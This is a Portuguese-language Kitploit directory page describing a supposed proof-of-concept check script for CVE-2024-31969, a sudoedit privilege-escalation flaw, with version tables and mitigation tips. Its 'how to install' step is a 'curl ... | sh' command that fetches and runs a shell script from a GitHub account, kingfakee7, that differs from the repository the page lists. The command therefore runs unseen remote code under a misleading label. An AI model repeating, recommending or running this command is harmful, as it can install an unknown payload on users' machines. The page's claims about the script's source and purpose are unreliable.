Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-31969 — Fornece um script de verificação de prova de conceito e documentação para CVE-2024-31969, uma escalada local de privilégios no sudoedit do sudo, incluindo versões afetadas e orientações de mitigação. | Kitploit
Ferramentas/GitHubGitHub/gmh5225/cve-2024-31969
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoAprendizado e EducaçãoRecursos Curados
GitHubgmh5225/cve-2024-31969

CVE-2024-31969

Fornece um script de verificação de prova de conceito e documentação para CVE-2024-31969, uma escalada local de privilégios no sudoedit do sudo, incluindo versões afetadas e orientações de mitigação.

Ver Repositório
há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

📌 CVE-2024-31969

CVE-2024-31969 é uma vulnerabilidade de escalonamento de privilégios local no sudo ao usar o comando sudoedit.

Essa vulnerabilidade foi introduzida desde o sudo 1.9.0 devido à forma como o sudoedit valida as variáveis de ambiente do usuário e a propriedade dos arquivos de forma inadequada.


📖 Descrição

Uma falha introduzida no sudo 1.9.0 na forma como o sudoedit validava as variáveis de ambiente e a propriedade dos arquivos dos usuários.

Essa vulnerabilidade permite que um usuário local com acesso ao sudoedit modifique arquivos arbitrários como root por meio da manipulação de variáveis de ambiente como SUDO_EDITOR, ou aproveitando-se de symlinks.


📊 Versões do Sudo Afetadas:

Versão do SudoStatus
1.9.0 → 1.9.15p4🔥 Vulnerável
1.9.15p5 ou superior✅ Seguro
1.8.x (incluindo 1.8.23)❌ Não afetado

📦 Como Instalar e Usar

Execute o seguinte comando:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ Solução / Mitigação

  • Atualize o sudo para a versão 1.9.15p5 ou mais recente.
  • Restrinja as regras do sudoers que permitem sudoedit para usuários não-root.
  • Use uma configuração segura de env_keep ou env_reset no arquivo /etc/sudoers.

📚 Referências

  • CVE-2024-31969 no NVD

⚠️ Aviso Legal

Este repositório foi criado para fins de educação e documentação de segurança de sistemas.
É estritamente proibido usar estas informações para atividades ilegais ou sem autorização por escrito do proprietário do sistema.
Qualquer forma de uso indevido é de total responsabilidade do usuário.

Baixar ferramenta